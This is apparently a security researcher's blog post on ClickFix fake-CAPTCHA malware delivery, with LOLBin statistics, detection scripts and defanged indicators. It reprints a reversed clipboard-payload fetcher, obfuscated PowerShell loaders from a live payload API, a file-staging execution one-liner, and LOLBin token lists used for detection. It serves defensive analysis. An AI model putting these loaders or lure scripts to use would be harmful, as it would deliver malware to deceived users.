ClickFix: The Gift That Keeps On Giving
Introduction: Why ClickFix Attacks Are Popular
At the beginning of June I presented the session ClickFix: The Gift That Keeps On Giving at OrangeCon. ClickFix emerged around 2024 and, as described by SANS, saw a 517% increase in 2025; the effectiveness of this technique is something we will have to deal with for years to come. Before diving into technical details, it is important to understand why ClickFix is so effective. The attack exploits fundamental user behaviours and training:
- We are trained to solve captcha challenges.
- There is a wide range of legitimate types of captchas available.
- We are used to following instructions.
- A non-technical audience lacks an understanding of the impact of pasting a command.
Due to the popularity of the technique, ClickFix now has its own MITRE ATT&CK technique, T1204.004: User Execution: Malicious Copy and Paste.
This blog presents the findings of the research conducted in preparation for the OrangeCon session. For the session, around 3000 ClickFix payloads were investigated and multiple ClickFix platforms were reversed to shed some light on the ongoing operations.
Interested in the full session? Watch the recording on YouTube
What Is a ClickFix Attack? Understanding the User Execution Technique
ClickFix is an initial access/dropper technique consisting of three steps, as described in the flow by BitDefender:
- Deception: The user is shown a fake verification (CAPTCHA) page that instructs them to follow steps to continue.
- Clipboard Injection: Malicious JavaScript silently copies a command into the user’s clipboard.
- Execution: The user pastes and runs the command, unknowingly executing malware that connects to the attacker’s infrastructure.

ClickFix Attack Delivery Methods: Email Campaigns and Malicious Websites
ClickFix campaigns reach users through two distinct methods:
Social Engineering Approach
- Threat actors craft email messages designed to appear urgent or legitimate to lure victims.
- Recipients are directed to dedicated ClickFix infrastructure.
- These campaigns are more likely to be targeted.
Browsing Based Infections
- Users conducting routine search engine queries inadvertently land on malicious pages.
- Compromised WordPress installations often serve as hosting platforms for ClickFix pages; vulnerable WordPress plugins are frequently exploited to inject malicious CAPTCHA overlays.
- A broad shotgun approach that relies on existing traffic to the compromised WordPress sites.
- Most often the cause of a ClickFix infection.
ClickFix Execution Techniques: Windows Run and Windows Terminal
As detection and prevention evolved, threat actors developed different ClickFix execution methods. This blog deep-dives into the Windows-based methods only, but note that macOS ClickFix campaigns are also active and effective. Two distinct ClickFix methods are in use today: Windows + R and Windows + X.

Windows + Run (Run Dialog)
The original fake captcha pointing to Windows + R emerged in 2024 and saw rapid adoption through 2025:
- Triggered via the Windows + R keyboard shortcut
- The user is prompted to paste a command into the Run dialog
- Executes as a child process of explorer.exe
- Process chain: explorer.exe → cmd.exe, powershell.exe or any other LOLBin with an outbound connection

Windows + X (Power User Menu)
A newer specialization emerged in 2025 and rapidly gained adoption into 2026:
- Triggered via the Windows + X keyboard shortcut
- Lures the victim into typing I or selecting Terminal
- Opens the Windows Terminal application
- PowerShell executes by default as the shell environment
- Process chain: WindowsTerminal.exe → powershell.exe
The shift toward Windows Terminal execution complicates detection logic, as Windows Terminal operations appear more legitimate than direct Run dialog execution and do not leave a RunMRU Registry entry behind.

Reverse Engineering ClickFix Platforms: JavaScript Injection and Payload Delivery
To understand the state of ClickFix in 2026 it was time to perform research. I wanted answers to the following questions:
- How are payloads delivered to the clipboard?
- What stage 2 loaders are used to deliver the payloads?
- How have the obfuscation techniques evolved over the past two years?
The research was done by reverse engineering ClickFix payloads and performing data analytics on the thousands of ClickFix domains and payloads added to the ClickFix Hunter project.
JavaScript Obfuscation and Clipboard Injection
As any advanced reverse engineer would do, the browser's developer tools are used to identify how payloads are injected into the clipboard. The screenshot confirms our assumption: a compromised WordPress site is hosting a fake captcha.
ClickFix pages use JavaScript to:
- Detect browser and operating system characteristics
- Craft OS-specific payloads
- Inject payloads into the user’s clipboard
- Prompt users to paste and execute
- Deliver payloads in the language of the visitor, with support for 25 different languages.

ClickFix Payload-as-a-Service (CPaaS): Scalable Malware Delivery Infrastructure
The JavaScript characteristics are not surprising and were expected, but that is not all that is included in the script. One of the more notable findings in researching this ClickFix operation is the existence of structured Payload-as-a-Service (CPaaS) infrastructure. A payload is loaded for each individual visitor; the infrastructure behind it is organized, API-driven, and designed for scalability.

Threat actors have implemented backend API endpoints that:
- Accept requests for payloads
- Use access tokens for authentication
- Generate unique, obfuscated payloads dynamically
- Return different obfuscation methods for each request
- Log metadata including timestamps and request parameters
The payload is dynamically collected in the function fetchPayload().

```javascript
// cloudflare.js — ClickFix Cloudflare CAPTCHA module
// Loaded by JS loader from API server: ?a=js&mode=cloudflare
// Exports via window.__BW_MODE_RUN__
window.__BW_MODE_RUN__ = function(ctx) {
  // ctx contains: panelBaseUrl, apiBase, apiUrl, logUrl, tokenUrl, downloadUrl,
  // mode, os, browser, country, storageKey, cfg, contractConfig
  // Fetch payload (PS command) from API server
  var currentPayload = '';
  var captchaMode = 1;
  function fetchPayload() {
    try {
      var url = ctx.downloadUrl || (ctx.apiBase + '/api/index.php?a=init');
      try {
        // Tag the request with the hostname of the site serving the lure
        var _ps = new URLSearchParams(window.location.search);
        var _src = _ps.get('src') || window.location.hostname;
        if (url.indexOf('src=') === -1)
          url += (url.indexOf('?') !== -1 ? '&' : '?') + 'src=' + encodeURIComponent(_src);
      } catch (ee) {}
      var xhr = new XMLHttpRequest();
      xhr.open('GET', url, true);
      xhr.onload = function() {
        if (xhr.status === 200) {
          try {
            // The API returns the command either as "token" or as "payload"
            var data = JSON.parse(xhr.responseText);
            if (data.token)
              currentPayload = data.token;
            else if (data.payload)
              currentPayload = data.payload;
            else
              currentPayload = xhr.responseText;
            if (data.captcha_mode) {
              console.log('[CF] captcha_mode from init:', data.captcha_mode);
            }
            if (data.captcha_mode === 2 && captchaMode !== 2) {
              captchaMode = 2;
              rerenderSteps();
            }
          } catch (e) {
            // Non-JSON response: treat the raw body as the payload
            if (xhr.responseText.length > 5)
              currentPayload = xhr.responseText;
          }
          syncCfId();
        }
      };
      xhr.send();
    } catch (e) {}
    // Also try cfg payload
    if (ctx.cfg && ctx.cfg.payload) {
      currentPayload = ctx.cfg.payload;
      syncCfId();
    }
    if (ctx.cfg && ctx.cfg.captcha_mode === 2)
      captchaMode = 2;
  }
```

Analyzing ClickFix CPaaS APIs: Dynamic Payload Generation and Obfuscation
If you do security research you often go on side quests, and this research had one related to payloads. I did not expect to find CPaaS infrastructure in a random ClickFix campaign, but once I did, I needed clarification. It was time to do a little digging to understand how it worked.
To understand what payloads are returned I requested 100 payloads from the CPaaS platform, a subset of the responses is added to this blog. These 100 payloads resulted in the following conclusions:
- 100 unique payloads observed (no payload reuse)
- Multiple obfuscation techniques employed dynamically (Base64, AES, TripleDES, Rijndael, Deflate)
- Client-side deobfuscation always results in identical malicious code
- Execution through a PowerShell runspace, for in-memory execution and obfuscation reasons
In this particular campaign the obfuscated payload is unique per request, but once the code is deobfuscated every payload yields the same values. It is only a matter of time before this changes to deliver deobfuscated payloads that differ as well.
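A triage routine for stage-1 payloads of this shape, written for this post as an added example (it is not code from the CPaaS platform or from ClickFix Hunter): it classifies the wrapper from the .NET types it calls, records the sizes of the base64 blobs (key, IV, ciphertext), flags runspace execution, and for the reversible Deflate and plain Base64 wrappers recovers the inner script. The two samples are constructed in the response format with dummy key bytes and a harmless inner script; AES and TripleDES decryption is left out because it needs a crypto library outside the standard library.

```python
import base64
import re
import zlib

# Wrapper types seen in the CPaaS responses, matched on the .NET classes they call.
METHOD_MARKERS = [
    ("tripledes", re.compile(r"\[Security\.Cryptography\.TripleDES\]", re.I)),
    ("aes", re.compile(r"\[Security\.Cryptography\.(Aes|Rijndael(Managed)?)\]", re.I)),
    ("deflate", re.compile(r"\[IO\.Compression\.DeflateStream\]", re.I)),
    ("base64", re.compile(r"UTF8\.GetString\(\[Convert\]::FromBase64String", re.I)),
]
B64_ARG = re.compile(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)")  # payload after JSON decoding (\u0027 -> ')
RUNSPACE = re.compile(r"\[runspacefactory\]::CreateRunspace\(\)", re.I)


def triage(payload: str) -> dict:
    """Classify one stage-1 payload; recover the inner script where no key is needed."""
    method = next((name for name, rx in METHOD_MARKERS if rx.search(payload)), "unknown")
    blobs = [base64.b64decode(s) for s in B64_ARG.findall(payload)]
    result = {
        "method": method,
        "blob_sizes": [len(b) for b in blobs],  # AES: [key, IV, ciphertext] lengths
        "runspace": bool(RUNSPACE.search(payload)),
        "script": None,
    }
    if method == "deflate" and blobs:
        # .NET DeflateStream is raw DEFLATE without a zlib header, hence wbits = -15.
        result["script"] = zlib.decompress(blobs[0], -15).decode("utf-8")
    elif method == "base64" and blobs:
        result["script"] = blobs[0].decode("utf-8")
    return result


def _b64(data: bytes) -> str:
    return base64.b64encode(data).decode()


RUN = "$rs=[runspacefactory]::CreateRunspace();$rs.Open();$pp=$rs.CreatePipeline();$pp.Commands.AddScript(%s);$pp.Invoke();$rs.Close();exit"
INNER = "Write-Output 'stage2 placeholder'"  # harmless stand-in for the real stage-2 script
_c = zlib.compressobj(9, zlib.DEFLATED, -15)
DEFLATED = _c.compress(INNER.encode()) + _c.flush()

# Constructed samples in the shape of the API responses; key, IV and ciphertext are dummy bytes.
SAMPLES = {
    "aes": ("$k=[Convert]::FromBase64String('%s');$iv=[Convert]::FromBase64String('%s');"
            "$c=[Convert]::FromBase64String('%s');$a=[Security.Cryptography.Aes]::Create();"
            "$a.Key=$k;$a.IV=$iv;$a.Mode='CBC';$a.Padding='PKCS7';$s=[Text.Encoding]::UTF8.GetString("
            "$a.CreateDecryptor().TransformFinalBlock($c,0,$c.Length));$a.Dispose();"
            % (_b64(b"K" * 32), _b64(b"I" * 16), _b64(b"C" * 48))) + RUN % "$s",
    "deflate": ("$m=[IO.MemoryStream]::new([Convert]::FromBase64String('%s'));$o=[IO.MemoryStream]::new();"
                "[IO.Compression.DeflateStream]::new($m,[IO.Compression.CompressionMode]::Decompress).CopyTo($o);"
                % _b64(DEFLATED)) + RUN % "[Text.Encoding]::UTF8.GetString($o.ToArray())",
}
```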
```json
[
{
"index": 1,
"timestamp": "2026-05-14T13:53:21.2886856+01:00",
"source": "https://babybon.cfd/api/index.php?q=IwvO43BY7yTFPPxkFys",
"payload": "$record9m=[Convert]::FromBase64String(\u0027jFcGdKEaozRvCRFaOJ+aDH1YWl73BIcjiGdhjvrGeBU=\u0027);$record9m=[Convert]::FromBase64String(\u0027I1c58dS81nJ1bkLJc3XOGg==\u0027);$packet4k=[Convert]::FromBase64String(\u0027...\u0027);$stream9m=[Security.Cryptography.Aes]::Create();$stream9m.Key=$record9m;$stream9m.IV=$record9m;$stream9m.Mode=\u0027CBC\u0027;$stream9m.Padding=\u0027PKCS7\u0027;$block0g=[Text.Encoding]::UTF8.GetString($stream9m.CreateDecryptor().TransformFinalBlock($packet4k,0,$packet4k.Length));$stream9m.Dispose();$rs=[runspacefactory]::CreateRunspace();$rs.Open();$pp=$rs.CreatePipeline();$pp.Commands.AddScript($block0g);$pp.Invoke();$rs.Close();exit"
},
{
"index": 2,
"timestamp": "2026-05-14T13:53:27.3626484+01:00",
"source": "https://babybon.cfd/api/index.php?q=IwvO43BY7yTFPPxkFys",
"payload": "$content5e=[IO.MemoryStream]::new([Convert]::FromBase64String(\u0027...\u0027));$response3f=[IO.MemoryStream]::new();[IO.Compression.DeflateStream]::new($content5e,[IO.Compression.CompressionMode]::Decompress).CopyTo($response3f);$rs=[runspacefactory]::CreateRunspace();$rs.Open();$pp=$rs.CreatePipeline();$pp.Commands.AddScript([Text.Encoding]::UTF8.GetString($response3f.ToArray()));$pp.Invoke();$rs.Close();exit"
},
...
{
"index": 98,
"timestamp": "2026-05-14T14:04:16.8138217+01:00",
"source": "https://babybon.cfd/api/index.php?q=IwvO43BY7yTFPPxkFys",
"payload": "$result3f=[Convert]::FromBase64String(\u0027Ktz7+VB4Dgh+S56QnsQ9b+yTEZcDEmzCgWdqN5NP1pg=\u0027);$chunk9m=[Convert]::FromBase64String(\u0027yzRZXgDE5aS/KI7N/mBfuQ==\u0027);$stream2b=[Convert]::FromBase64String(\u0027/bFMPD/YP0D26aQPJnYV8P0QL5S8pn4WHRmqijcKp7cu2w5nU59xIRkCp+xhWyePp1XY7zgh99ONxTaB7riYIsIGQNlif6k6CnOfX+QYV3mPCnGUV3+2tqepvx8cAzbBQcakOtFOUe6qOh/O/2uIvneoxv+T7swbXdOXqgFJYFeYxPGRXiQ7lEhr15FNXSc7sL85Fq+Pji3Nbrg9DP/FCi0eTaKECGBDxxEaTlbTGESGrqUO+IMbrD9MtiYmGJksbKfohH5Pa9+w9voMW/Ou9kC5KIdId/sM7y+qPVWvKOS0smI0FCvr1mqyV/unMChYe0/npvXkFMoPdqd8ahS1zWokuYv6cc0vBvSLKh/jyNIwn/++3aVbdJDVUZxwQd40PeXrHTWeEXNM3rqZBx4oBwwGBqMaWFd1dfLqOds5KllumpzG3ZgVO2++h4AcjCC/j4+syH8J+krOuCtol8wh99XlhDU9Oz4z4WfyCBdqaN0FT9Vci20Wp2XLS2/rHGtZNajI9k+bisB4JOKZhPU+ApdlIDAQp85GiwVe2jacP0SQ5vqNgru1q6IOgEMyCRAKWLM5+1GVva/E/Yc/DfbCl52pvFyxVkBlR7bbywh5WuPFTUAJIaI1ztjJknQIh+Nv/WvpFFn7fRixIgC+L0158+6wXh6YAVhtS566wrgZkRvvZlA4GBOEFGpEtY9bIktOJ0FV4+3gjPpiPmKp0ENuzMlgNIaj8mkK3xkZfaftAs1jgLAq5a9+N92pj9NicsDgwvPQRdo6/Ot4qIQFVL8UdcAt6tf4L9SCZYB6+S4PM8l/K1Uq4bmSrDP4MKC8Vlb+oNjuQfAGJdrvfXXQyy4vJw8gSK/QZ+j+DxoWYbDrWbARIOIBO8eCGjuK1mtm3HsueyBqdD/ckcnjn3wxyrj3yS/oWR2tCioFceaYA8nKaDY1v+0bLe2bBmsMTkYzGamjruI9lueAZTlpSLPmQ88TLu70zYcLHAlcdBcgNXFKnix2T6Zv7065bIXwpDlqFkWa+i7x6eTi+uqiysZbxNIhtJpLrRgPjS3OKleta8SoxVgz0mslu+JS8yRIOSx6/2siNGZbFymFMslWuSDS1FNx7MsXUeo8ZRGvzSaEYajjjg574M1QbsW3wqMmSXHF3rQX\u0027);$content9m=[Security.Cryptography.Aes]::Create();$content9m.Key=$result3f;$content9m.IV=$chunk9m;$content9m.Mode=\u0027CBC\u0027;$content9m.Padding=\u0027PKCS7\u0027;$result5e=[Text.Encoding]::UTF8.GetString($content9m.CreateDecryptor().TransformFinalBlock($stream2b,0,$stream2b.Length));$content9m.Dispose();$rs=[runspacefactory]::CreateRunspace();$rs.Open();$pp=$rs.CreatePipeline();$pp.Commands.AddScript($result5e);$pp.Invoke();$rs.Close();exit"
},
{
"index": 99,
"timestamp": "2026-05-14T14:04:19.8957583+01:00",
"source": "https://babybon.cfd/api/index.php?q=IwvO43BY7yTFPPxkFys",
"payload": "$chunk7x=[Convert]::FromBase64String(\u0027lVdZkhRmBSHuK0qJ2XyABBPS4rqZzRShA+H5E7DDIP8=\u0027);$segment4k=[Convert]::FromBase64String(\u0027I7LvI/Lh7Jb0o8r3DI26Ug==\u0027);$stream5e=[Convert]::FromBase64String(\u0027...\u0027);$buffer5e=[Security.Cryptography.Aes]::Create();$buffer5e.Key=$chunk7x;$buffer5e.IV=$segment4k;$buffer5e.Mode=\u0027CBC\u0027;$buffer5e.Padding=\u0027PKCS7\u0027;$stream8d=[Text.Encoding]::UTF8.GetString($buffer5e.CreateDecryptor().TransformFinalBlock($stream5e,0,$stream5e.Length));$buffer5e.Dispose();$rs=[runspacefactory]::CreateRunspace();$rs.Open();$pp=$rs.CreatePipeline();$pp.Commands.AddScript($stream8d);$pp.Invoke();$rs.Close();exit"
},
{
"index": 100,
"timestamp": "2026-05-14T14:04:22.0036431+01:00",
"source": "https://babybon.cfd/api/index.php?q=IwvO43BY7yTFPPxkFys",
"payload": "$data4k=[Security.Cryptography.TripleDES]::Create();$data4k.Key=[Convert]::FromBase64String(\u0027KF0oKBfK7z4Uit01oqzmmY7U8o+v2kc2\u0027);$data4k.IV=[Convert]::FromBase64String(\u00273cSSMwvFufk=\u0027);$data9m=[Convert]::FromBase64String(\u0027...\u0027);$result0g=[Text.Encoding]::UTF8.GetString($data4k.CreateDecryptor().TransformFinalBlock($data9m,0,$data9m.Length));$data4k.Dispose();$rs=[runspacefactory]::CreateRunspace();$rs.Open();$pp=$rs.CreatePipeline();$pp.Commands.AddScript($result0g);$pp.Invoke();$rs.Close();exit"
}
]
```

ClickFix Stage 2 Loaders: Living Off the Land Binary (LOLBIN) Abuse
The second question was which stage 2 loaders are used to deliver the payloads. To research this the great ClickFix Hunter project is used. This project shows which domains were compromised for ClickFix and which payload they delivered. You can download the complete dataset in JSON or XLSX for analysis.
To answer the question I downloaded just over 3000 entries from the ClickFix Hunter project and uploaded them into an Azure Data Explorer cluster. The blog Incident Response Part 2: What about the other logs? explains how to ingest the data into Azure Data Explorer. Once the data is uploaded you can use the query below to perform the analysis; in my case the name of the table is OrangeCon_ClickFix.
```kusto
// Tokens that identify a stage 2 loader (LOLBin) in a ClickFix command line
let dropper_tokens = dynamic([
    "powershell", "powershell.exe", "pwsh", "pwsh.exe", "iwr", "iex",
    "cmd", "cmd.exe",
    "msiexec", "msiexec.exe",
    "curl", "curl.exe",
    "wget", "wget.exe",
    "rundll32", "rundll32.exe",
    "regsvr32", "regsvr32.exe",
    "wscript", "wscript.exe",
    "cscript", "cscript.exe",
    "schtasks", "schtasks.exe",
    "bitsadmin", "bitsadmin.exe",
    "mshta", "mshta.exe",
    "certutil", "certutil.exe",
    "wmic", "wmic.exe",
    "net", "net.exe",
    "ssh", "ssh.exe",
    "syncappvpublishingserver.vbs"
]);
OrangeCon_ClickFix
| extend Commandline = tolower(commandline)
// Bash-based payloads target macOS; everything else is treated as Windows
| extend TargetOS = case(
    Commandline has @"/bin/bash", "MacOS",
    "Windows"
)
| extend Parsedcommandline = parse_command_line(Commandline, "windows")
| extend DropperPrograms = set_intersect(Parsedcommandline, dropper_tokens)
| where TargetOS == "Windows"
| project-away commandline
// Tokens that often appear glued to other text and are missed by the command line parser
| extend DropperPrograms = array_concat(DropperPrograms, pack_array(
    iff(Commandline has "iex", "iex", ""),
    iff(Commandline has "cmd", "cmd", ""),
    iff(Commandline has "bitsadmin", "bitsadmin", ""),
    iff(Commandline has "curl", "curl", ""),
    iff(Commandline has "syncappvpublishingserver.vbs", "syncappvpublishingserver.vbs", "")))
| mv-expand DropperPrograms
| where isnotempty(DropperPrograms)
| summarize count() by tostring(DropperPrograms)
// Normalise aliases (with/without .exe, cmdlet aliases) onto one loader name
| extend Matches = dynamic([])
| extend NormMatches = dynamic([])
| extend NormMatches = iff(DropperPrograms has_any ("powershell", "powershell.exe", "iex", "invoke-expression", "iwr", "invoke-webrequest"),
    array_concat(NormMatches, dynamic(["powershell"])), NormMatches)
| extend NormMatches = iff(DropperPrograms has_any ("cmd", "cmd.exe"),
    array_concat(NormMatches, dynamic(["cmd"])), NormMatches)
| extend NormMatches = iff(DropperPrograms has "bitsadmin",
    array_concat(NormMatches, dynamic(["bitsadmin"])), NormMatches)
| extend NormMatches = iff(DropperPrograms has_any ("curl", "curl.exe"),
    array_concat(NormMatches, dynamic(["curl"])), NormMatches)
| extend NormMatches = iff(DropperPrograms has "syncappvpublishingserver.vbs",
    array_concat(NormMatches, dynamic(["appv_sync"])), NormMatches)
| extend Final = iff(array_length(NormMatches) > 0, NormMatches[0], DropperPrograms)
| summarize Total = sum(count_) by Stage2Loaders = Final
| sort by Total
```

LOLBin Usage Statistics
After the content of the clipboard has been executed, ClickFix payloads use Living-off-the-Land Binaries (LOLBins) (T1218) to download and execute secondary stages. PowerShell, cmd and msiexec are the most commonly used to download additional payloads. The percentages are relative to the roughly 3000 analysed payloads; a single payload often chains several LOLBins, so the column adds up to more than 100%.

| LOLBin | Count | Percentage |
|---|---|---|
| PowerShell | 1,170 | 39.0% |
| cmd | 1,169 | 38.9% |
| msiexec | 1,019 | 33.9% |
| curl | 268 | 8.9% |
| net | 183 | 6.1% |
| mshta | 124 | 4.1% |
| AppV Sync (syncappvpublishingserver.vbs) | 44 | 1.5% |
| wscript | 37 | 1.2% |
| ssh | 8 | 0.3% |
| rundll32 | 4 | 0.1% |
| regsvr32 | 2 | 0.1% |
| bitsadmin | 1 | 0.0% |
| wmic | 1 | 0.0% |
New ClickFix Payload Techniques: How Attackers Continue to Evolve
As defenders adapt their detection and prevention strategies, threat actors continue to modify ClickFix workflows to bypass existing controls and increase the success rate of their campaigns. During the research for OrangeCon, a new payload delivery method was observed that shows how quickly ClickFix operators adjust their techniques when defensive measures evolve. The observed technique is effective because the malicious content is no longer placed directly in the clipboard; instead, it uses a trusted file location and a legitimate execution flow to reduce the chance of detection by security controls.
This new payload delivery method uses:
- A fake captcha
- A file downloaded to the Downloads folder
- A system clipboard populated with an orchestrator string
- Execution of the clipboard content, which points to the file in the Downloads folder; this goes around AMSI, as the pasted text itself is not malicious

```powershell
powershell -C "$t=$env:TMP;Move-Item \"$HOME\Downloads\tmp.zip\" \"$t\7947.zip\";tar -xf \"$t\7947.zip\" -C \"$t\";conhost --headless powershell -ExecutionPolicy Bypass -File \"$t\tmp.ps1\" # "* I am not a robot reCAPTCHA Verification ID:7947 *"
```
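Detection logic for the process chains described in the execution section and for this file-staging variant, as an added example that is not part of the original post: it scores one process-creation event against the explorer.exe and WindowsTerminal.exe parent chains, the trailing reCAPTCHA comment, and the Downloads/tar/conhost staging. The ProcessEvent record and the three sample events are constructed; the third reuses the command line quoted above, and the second uses the reserved host example.invalid.

```python
import re
from dataclasses import dataclass

# Child images that the LOLBin statistics on this page show most often in ClickFix command lines.
LOLBINS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "msiexec.exe", "curl.exe"}
# Download-and-execute hints (URL, iwr/iex, curl).
NET_HINTS = re.compile(r"https?://|\biwr\b|\binvoke-webrequest\b|\biex\b|\binvoke-expression\b|\bcurl\b", re.I)
# Trailing "# ..." comment carrying the CAPTCHA lure text.
LURE_COMMENT = re.compile(r"#[^\n]*(I am not a robot|reCAPTCHA|Verification ID)", re.I)
# File-drop variant: archive moved out of Downloads, unpacked with tar, run through headless conhost.
DOWNLOADS_STAGING = re.compile(r"\\Downloads\\.*\btar\s+-xf\b|conhost\s+--headless", re.I)


@dataclass
class ProcessEvent:
    parent: str   # parent image name, e.g. explorer.exe or WindowsTerminal.exe
    image: str    # created process image name
    cmdline: str


def clickfix_signals(ev: ProcessEvent) -> list:
    """Return the ClickFix indicators matched by one process-creation event."""
    hits = []
    parent, image = ev.parent.lower(), ev.image.lower()
    suspicious = NET_HINTS.search(ev.cmdline) or DOWNLOADS_STAGING.search(ev.cmdline)
    if image in LOLBINS and suspicious:
        if parent == "explorer.exe":
            hits.append("run_dialog_chain")    # Windows + R; corroborate with a RunMRU entry
        elif parent == "windowsterminal.exe":
            hits.append("terminal_chain")      # Windows + X; no RunMRU entry is left behind
    if LURE_COMMENT.search(ev.cmdline):
        hits.append("captcha_lure_comment")
    if DOWNLOADS_STAGING.search(ev.cmdline):
        hits.append("downloads_staging")
    return hits


# Constructed sample events; the third reuses the command line quoted above.
SAMPLE_EVENTS = [
    ProcessEvent("explorer.exe", "cmd.exe", "cmd /c dir"),
    ProcessEvent("WindowsTerminal.exe", "powershell.exe",
                 'powershell -w h -c "iwr https://example.invalid/a | iex"'),
    ProcessEvent("explorer.exe", "powershell.exe",
                 r'''powershell -C "$t=$env:TMP;Move-Item \"$HOME\Downloads\tmp.zip\" \"$t\7947.zip\";tar -xf \"$t\7947.zip\" -C \"$t\";conhost --headless powershell -ExecutionPolicy Bypass -File \"$t\tmp.ps1\" # "* I am not a robot reCAPTCHA Verification ID:7947 *"'''),
]


def scan(events) -> dict:
    """Map each event's command line to the indicators it matched (empty list = nothing found)."""
    return {ev.cmdline: clickfix_signals(ev) for ev in events}
```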
Indicators of Compromise
During this research multiple Payload API servers were discovered. These are hosted on the following domains:
- Comicstar[.]lat
- Babybon[.]cfd
- merkantalolol[.]asia
Note that a connection to these domains is not equal to a successful payload execution; it only makes it highly likely that a payload was placed in the clipboard of a user.
Conclusion
ClickFix is here to stay! It demonstrates that the human element remains one of the most effective attack vectors, especially when combined with legitimate system functionality and trusted binaries. Both threat actors and red teams will keep ClickFix methods in their attack arsenal and continue to develop new techniques. To keep countering the attacks, defenders need to stay agile and continuously improve prevention, detection and response activities to combat the fast-changing delivery methods. Open source projects such as the ClickFix Hunter project should be reviewed periodically to understand the latest delivery methods.
Questions? Feel free to reach out to me on any of my socials.
